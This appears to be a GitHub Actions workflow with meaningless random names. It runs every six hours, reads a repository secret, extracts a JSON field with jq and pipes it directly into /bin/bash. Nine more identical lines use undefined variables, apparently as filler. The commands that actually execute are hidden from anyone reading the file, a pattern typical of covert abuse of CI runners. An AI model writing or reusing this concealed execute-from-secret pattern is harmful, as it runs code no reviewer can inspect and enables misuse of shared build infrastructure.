name: caotingxia3189
on:
  workflow_dispatch:
  schedule:
    - cron: '8 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: caotingxia3189
        env:
          kbr5166: ${{ secrets.kbr5166 }}
        run: |
          echo $kbr5166 | jq -r .nrph593 | /bin/bash
          echo $kkgao2 | jq -r .v1787 | /bin/bash
          echo $jkq107 | jq -r .qn85 | /bin/bash
          echo $iy10383 | jq -r .o3 | /bin/bash
          echo $gh397 | jq -r .la0234 | /bin/bash
          echo $boofw9 | jq -r .i24206 | /bin/bash
          echo $frnrr859 | jq -r .zks60 | /bin/bash
          echo $jcm580 | jq -r .kr54 | /bin/bash
          echo $zvkqx6740 | jq -r .zsbup6 | /bin/bash
          echo $jdelr1624 | jq -r .wjl54284 | /bin/bash

